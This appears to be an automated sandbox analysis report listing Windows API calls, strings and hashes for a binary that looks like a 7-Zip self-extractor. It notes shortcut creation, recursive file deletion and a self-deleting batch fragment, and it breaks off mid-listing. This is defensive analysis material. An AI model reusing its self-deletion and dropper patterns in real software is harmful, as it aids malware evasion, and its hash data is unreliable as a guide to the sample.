                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: ExceptionThrow
                                                                • String ID:
                                                                • API String ID: 432778473-0
                                                                • Opcode ID: 85c4e5dde0f8cee934fbe77132b2d5831568e55a053817787dcfc8e06ea2b7f6
                                                                • Instruction ID: f2b552c6dcb6979234feea5fe890f572eb9d388e9264680fa6f26452196acfb0
                                                                • Opcode Fuzzy Hash: 85c4e5dde0f8cee934fbe77132b2d5831568e55a053817787dcfc8e06ea2b7f6
                                                                • Instruction Fuzzy Hash: 20017171600701AFDB28CFBAD805997BBF8EF85314704496EE482D3651E374F946CB50
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: free
                                                                • String ID:
                                                                • API String ID: 1294909896-0
                                                                • Opcode ID: ad693850b0beb581ae9f70f91648a78de6b85f526a16152dd36665cc48ec9015
                                                                • Instruction ID: 8ccd5c106adaedd21fdabd868c2a091acccb285e2c6396e7c66228af9079aab7
                                                                • Opcode Fuzzy Hash: ad693850b0beb581ae9f70f91648a78de6b85f526a16152dd36665cc48ec9015
                                                                • Instruction Fuzzy Hash: 68E0ED311087008BEB74DA38A941F97B3DAAB14314F15893FE89AE7690EB74FC448A59
                                                                APIs
                                                                • ??2@YAPAXI@Z.MSVCRT(00000018,00000000,004044E9,?,?,?,?,?,?,?,?,?,?,00000000,00000020,?), ref: 00402F71
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: ??2@
                                                                • String ID:
                                                                • API String ID: 1033339047-0
                                                                • Opcode ID: 76c2607c9262a084594b8968e60506e1095ba5b3921c342d3f15f01c827a8030
                                                                • Instruction ID: 194059228ff5733793a196764ebf5a0b63d959e09992ce12dff2d54d27d13516
                                                                • Opcode Fuzzy Hash: 76c2607c9262a084594b8968e60506e1095ba5b3921c342d3f15f01c827a8030
                                                                • Instruction Fuzzy Hash: 67D0A9313083121ADA5432320A09AAF84848B503A0F10083FB800A32D1DCBE8C81A299
                                                                APIs
                                                                • CloseHandle.KERNELBASE(00000001,000000FF,0040DA61,00413330,?,0040DB39,L@,40000000,00000000,00000000,00000000,0040DB50,00000000,00000001,00000001,00000080), ref: 0040D990
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: CloseHandle
                                                                • String ID:
                                                                • API String ID: 2962429428-0
                                                                • Opcode ID: 5a1e794e604a6db35733be3680912b24c50de2529967425d082228c541f5af6f
                                                                • Instruction ID: 71cfb53d0268b44c797f7400575dcc0518408263689e7c465582b3111ebcfb94
                                                                • Opcode Fuzzy Hash: 5a1e794e604a6db35733be3680912b24c50de2529967425d082228c541f5af6f
                                                                • Instruction Fuzzy Hash: 95D0127251422156CF646E7CB8849C277D85A06334335176AF0B4E32E4D3749DCB5698
                                                                APIs
                                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,0040E4D6,00020000,00000000,?,00000000,?,0040D92B,?,?,00000000,?,0040D96E), ref: 004024E0
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: AllocVirtual
                                                                • String ID:
                                                                • API String ID: 4275171209-0
                                                                • Opcode ID: 076169c5b403ddfe74b0b9752022086d8412a0b80d08fe31e2627fee67d73aef
                                                                • Instruction ID: 23ad038ad5ccaf642d49e1102795c1c714580f299e31bec6e074b0e2bc220d86
                                                                • Opcode Fuzzy Hash: 076169c5b403ddfe74b0b9752022086d8412a0b80d08fe31e2627fee67d73aef
                                                                • Instruction Fuzzy Hash: D3C080301443007DED115F505E06B463A916B44717F508065F344540D0C7F484009509
                                                                APIs
                                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000,0040E561,?,00000004,0040E5B0,?,?,004117E5,?), ref: 00401B2A
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: FreeVirtual
                                                                • String ID:
                                                                • API String ID: 1263568516-0
                                                                • Opcode ID: 727c456c664ec040fae2a494910ef8e866b16c48e489126d85a402f0e100615f
                                                                • Instruction ID: 5381ed20748db0b7fd93371e38984c83fa4171db9cf80dc6a42123bab5888d64
                                                                • Opcode Fuzzy Hash: 727c456c664ec040fae2a494910ef8e866b16c48e489126d85a402f0e100615f
                                                                • Instruction Fuzzy Hash: 45A002305446007ADE515B10DD05F457F516744B11F20C5547155540E586755654DA09
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: free
                                                                • String ID:
                                                                • API String ID: 1294909896-0
                                                                • Opcode ID: d9246d09a93a321ccd45a7f77b4b3a05b9734a8e70a1dc2b954ba7e43b8076d7
                                                                • Instruction ID: 7baee4be7330d58fba6a4d3e6254b3dabd4481adb37f3967e502ba2394f26960
                                                                • Opcode Fuzzy Hash: d9246d09a93a321ccd45a7f77b4b3a05b9734a8e70a1dc2b954ba7e43b8076d7
                                                                • Instruction Fuzzy Hash:
                                                                APIs
                                                                • _wtol.MSVCRT ref: 004034E5
                                                                • SHGetSpecialFolderPathW.SHELL32(00000000,?,CC5BE863,00000000,004177A0,00000000,00417794), ref: 00403588
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 004035F9
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?), ref: 00403601
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?), ref: 00403609
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?), ref: 00403611
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?), ref: 00403619
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 00403621
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 00403629
                                                                • _wtol.MSVCRT ref: 0040367F
                                                                • CoCreateInstance.OLE32(00414BF4,00000000,00000001,00414BE4,00404F9B,.lnk,?,0000005C), ref: 00403720
                                                                • ??3@YAXPAX@Z.MSVCRT(?,0000005C), ref: 004037B8
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,0000005C), ref: 004037C0
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,0000005C), ref: 004037C8
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0000005C), ref: 004037D0
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,0000005C), ref: 004037D8
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,0000005C), ref: 004037E0
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,0000005C), ref: 004037E8
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,0000005C), ref: 004037EE
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,0000005C), ref: 004037F6
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: ??3@$_wtol$CreateFolderInstancePathSpecial
                                                                • String ID: .lnk
                                                                • API String ID: 408529070-24824748
                                                                • Opcode ID: cb1a116a375c0276f3cc47ebae34f017b071fc5c88c5a353f484599fe5934efa
                                                                • Instruction ID: c4a1d47ac56633071a1bd2db01059e5edb54ffe0bccc65637149caefe5d2277b
                                                                • Opcode Fuzzy Hash: cb1a116a375c0276f3cc47ebae34f017b071fc5c88c5a353f484599fe5934efa
                                                                • Instruction Fuzzy Hash: 8EA18A71910219ABDF04EFA1CC46DEEBB79EF44705F50442AF502B71A1EB79AA81CB18
                                                                APIs
                                                                • GetLastError.KERNEL32(00000000,00000020,?), ref: 00401FEC
                                                                • wsprintfW.USER32 ref: 00401FFD
                                                                • GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 00402012
                                                                • GetLastError.KERNEL32 ref: 00402017
                                                                • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00402032
                                                                • GetEnvironmentVariableW.KERNEL32(?,00000000,?), ref: 00402045
                                                                • GetLastError.KERNEL32 ref: 0040204C
                                                                • lstrcmpiW.KERNEL32(00000000,00000020), ref: 00402061
                                                                • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00402071
                                                                • ??3@YAXPAX@Z.MSVCRT(00000020), ref: 0040208F
                                                                • SetLastError.KERNEL32(00000000), ref: 00402098
                                                                • lstrlenA.KERNEL32(00413FD0), ref: 004020CC
                                                                • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004020E7
                                                                • GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402119
                                                                • _wtol.MSVCRT ref: 0040212A
                                                                • MultiByteToWideChar.KERNEL32(00000000,00413FD0,00000001,00000000,00000002), ref: 0040214A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast$??2@??3@EnvironmentVariable$ByteCharInfoLocaleMultiWide_wtollstrcmpilstrlenwsprintf
                                                                • String ID: 7zSfxString%d$XpA$\3A
                                                                • API String ID: 2117570002-3108448011
                                                                • Opcode ID: 332d11925e247980b34bd098e8b038dc96ba1155979fc83484f9ac8f636b93aa
                                                                • Instruction ID: 5c0681f152172bce6659d4e02be164ba9bb36eab7c70e8d4f1a0ed4420d73572
                                                                • Opcode Fuzzy Hash: 332d11925e247980b34bd098e8b038dc96ba1155979fc83484f9ac8f636b93aa
                                                                • Instruction Fuzzy Hash: 11518471604305AFDB209F74DD899DBBBB9EB08345B11407AF646E62E0E774AA44CB18
                                                                APIs
                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00401BEA
                                                                • FindResourceExA.KERNEL32(00000000,?,?,00000000), ref: 00401C07
                                                                • FindResourceExA.KERNEL32(00000000,?,?,00000409), ref: 00401C1B
                                                                • SizeofResource.KERNEL32(00000000,00000000), ref: 00401C2C
                                                                • LoadResource.KERNEL32(00000000,00000000), ref: 00401C36
                                                                • LockResource.KERNEL32(00000000), ref: 00401C41
                                                                • LoadLibraryA.KERNEL32(kernel32,SetProcessPreferredUILanguages), ref: 00401C6D
                                                                • GetProcAddress.KERNEL32(00000000), ref: 00401C76
                                                                • wsprintfW.USER32 ref: 00401C95
                                                                • LoadLibraryA.KERNEL32(kernel32,SetThreadPreferredUILanguages), ref: 00401CAA
                                                                • GetProcAddress.KERNEL32(00000000), ref: 00401CAD
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: Resource$Load$AddressFindLibraryProc$HandleLockModuleSizeofwsprintf
                                                                • String ID: %04X%c%04X%c$SetProcessPreferredUILanguages$SetThreadPreferredUILanguages$kernel32
                                                                • API String ID: 2639302590-365843014
                                                                • Opcode ID: a5d0d847a20e007311d4afefc35bdd0d1043cb70ace8406c3a5a944bd10805b9
                                                                • Instruction ID: 1b367ad183524107b1556f539f271e2bfa11f4d2ebd4ebc35158efee647c5c94
                                                                • Opcode Fuzzy Hash: a5d0d847a20e007311d4afefc35bdd0d1043cb70ace8406c3a5a944bd10805b9
                                                                • Instruction Fuzzy Hash: 002153B1944318BBDB109FA59D48F9B7FBCEB48751F118036FA05B72D1D678DA008BA8
                                                                APIs
                                                                • wvsprintfW.USER32(?,00000000,?), ref: 0040779A
                                                                • GetLastError.KERNEL32(?,00000000,0000FDE9), ref: 004077AB
                                                                • FormatMessageW.KERNEL32(00001100,00000000,00000000,00402A50,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077D3
                                                                • FormatMessageW.KERNEL32(00001100,00000000,00402A50,00000000,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077E8
                                                                • lstrlenW.KERNEL32(?,?,00000000,0000FDE9), ref: 004077FB
                                                                • lstrlenW.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407802
                                                                • ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,0000FDE9), ref: 00407817
                                                                • lstrcpyW.KERNEL32(00000000,?,?,00000000,0000FDE9), ref: 0040782D
                                                                • lstrcpyW.KERNEL32(-00000002,00402A50,?,00000000,0000FDE9), ref: 0040783E
                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000,0000FDE9), ref: 00407847
                                                                • LocalFree.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407851
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: FormatMessagelstrcpylstrlen$??2@??3@ErrorFreeLastLocalwvsprintf
                                                                • String ID:
                                                                • API String ID: 829399097-0
                                                                • Opcode ID: bf60f95a6a1f59c2bb6c04e2e113b9a1b5cd8de0030c6a868400c9436056581d
                                                                • Instruction ID: 98041b7e574f1f1c61a73cce3db0a13ad597614178cae5aaf21d0c5f67190c53
                                                                • Opcode Fuzzy Hash: bf60f95a6a1f59c2bb6c04e2e113b9a1b5cd8de0030c6a868400c9436056581d
                                                                • Instruction Fuzzy Hash: 85218172804209BEDF14AFA0DC85CEB7BACEB04355B10847BF506A7150EB34EE848BA4
                                                                APIs
                                                                • FindFirstFileW.KERNEL32(?,?,00413454,?,?,?,00000000), ref: 00402BA8
                                                                • lstrcmpW.KERNEL32(?,00413450,?,0000005C,?,?,?,00000000), ref: 00402BFB
                                                                • lstrcmpW.KERNEL32(?,00413448,?,?,00000000), ref: 00402C11
                                                                • SetFileAttributesW.KERNEL32(?,00000000,?,0000005C,?,?,?,00000000), ref: 00402C27
                                                                • DeleteFileW.KERNEL32(?,?,?,00000000), ref: 00402C2E
                                                                • FindNextFileW.KERNEL32(00000000,00000010,?,?,00000000), ref: 00402C40
                                                                • FindClose.KERNEL32(00000000,?,?,00000000), ref: 00402C4F
                                                                • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000000), ref: 00402C5A
                                                                • RemoveDirectoryW.KERNEL32(?,?,?,00000000), ref: 00402C63
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 00402C6E
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 00402C79
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: File$Find$??3@Attributeslstrcmp$CloseDeleteDirectoryFirstNextRemove
                                                                • String ID:
                                                                • API String ID: 1862581289-0
                                                                • Opcode ID: 3adc14f40e23b1cdad4e4199877390cf68653eec517b691feb080405b1435fa2
                                                                • Instruction ID: 7ffcf375551190f92b7aba4ef5ef3cd4ed0286f9dec59b0789af02bc25bdcc12
                                                                • Opcode Fuzzy Hash: 3adc14f40e23b1cdad4e4199877390cf68653eec517b691feb080405b1435fa2
                                                                • Instruction Fuzzy Hash: A321A230500209BAEB10AF61DE4CFBF7B7C9B0470AF14417AB505B11E0EB78DB459A6C
                                                                APIs
                                                                • LoadLibraryA.KERNEL32(uxtheme,?,00407F57,000004B1,00000000,?,?,?,?,?,0040803E), ref: 00406D65
                                                                • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 00406D76
                                                                • GetWindow.USER32(?,00000005), ref: 00406D8F
                                                                • GetWindow.USER32(00000000,00000002), ref: 00406DA5
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: Window$AddressLibraryLoadProc
                                                                • String ID: SetWindowTheme$\EA$uxtheme
                                                                • API String ID: 324724604-1613512829
                                                                • Opcode ID: 249f97bdfab0f17876e9996a58034084f131abf1d363e9cca7f48feb82d9f298
                                                                • Instruction ID: f2e0bdee1e376373ef12be0a37c87caa708c4cf78f5ebad58458586032015049
                                                                • Opcode Fuzzy Hash: 249f97bdfab0f17876e9996a58034084f131abf1d363e9cca7f48feb82d9f298
                                                                • Instruction Fuzzy Hash: 47F0A73274172537C6312A6A6C4CF9B6B9C9FC6B51B070176B905F7280DA6CCD0045BC
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ff1f75169f88eb9072603f867e1b9c380318d13f71256e892471df4b1a5f26b0
                                                                • Instruction ID: 2cf66fefa79674a345482580870fbecf2b771b639b37e27eb1fc897e4fc9b441
                                                                • Opcode Fuzzy Hash: ff1f75169f88eb9072603f867e1b9c380318d13f71256e892471df4b1a5f26b0
                                                                • Instruction Fuzzy Hash: 44126E31E00129DFDF08CF68C6945ECBBB2EF85345F2585AAD856AB280D6749EC1DF84
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6e2407533f79ef22d8e6d794d98aef535f9904e2ced6ea7e6753812806be966d
                                                                • Instruction ID: 8743f1180a29be23716da9caa70fae7f7856ace610ba4dfa2102d12747f13ae8
                                                                • Opcode Fuzzy Hash: 6e2407533f79ef22d8e6d794d98aef535f9904e2ced6ea7e6753812806be966d
                                                                • Instruction Fuzzy Hash: D12129725104255BC711DF1DE8887B7B3E1FFC4319F678A36DA81CB281C629D894C6A0
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a91e830b051fd3563903b3b4c558af91fd9d6843125d3e1887e1db665648e344
                                                                • Instruction ID: 7cc7f0f00d3fdf34bc0739e2af2c3edfb6ca911da6c9eaecf720caf4c907201e
                                                                • Opcode Fuzzy Hash: a91e830b051fd3563903b3b4c558af91fd9d6843125d3e1887e1db665648e344
                                                                • Instruction Fuzzy Hash: 0621F53290062587CB12CE6EE4845A7F392FBC436AF134727EE84A3291C62CA855C6A0
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: dde32e57196543c58229ec3a92fed9e80e5316f67d8377c6540d091cf30b3fc0
                                                                • Instruction ID: 0032c0c3dd355d3b1328166acc4be040b7821e5e83bc1fe28c274bced218c28f
                                                                • Opcode Fuzzy Hash: dde32e57196543c58229ec3a92fed9e80e5316f67d8377c6540d091cf30b3fc0
                                                                • Instruction Fuzzy Hash: 4EF074B5A05209EFCB09CFA9C49199EFBF5FF48304B1084A9E819E7350E731AA11CF50
                                                                APIs
                                                                • GetDriveTypeW.KERNEL32(?,?,?), ref: 00404B46
                                                                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00404B77
                                                                • WriteFile.KERNEL32(004177C4,?,?,00406437,00000000,del ",:Repeat,00000000), ref: 00404C2C
                                                                • ??3@YAXPAX@Z.MSVCRT(?), ref: 00404C37
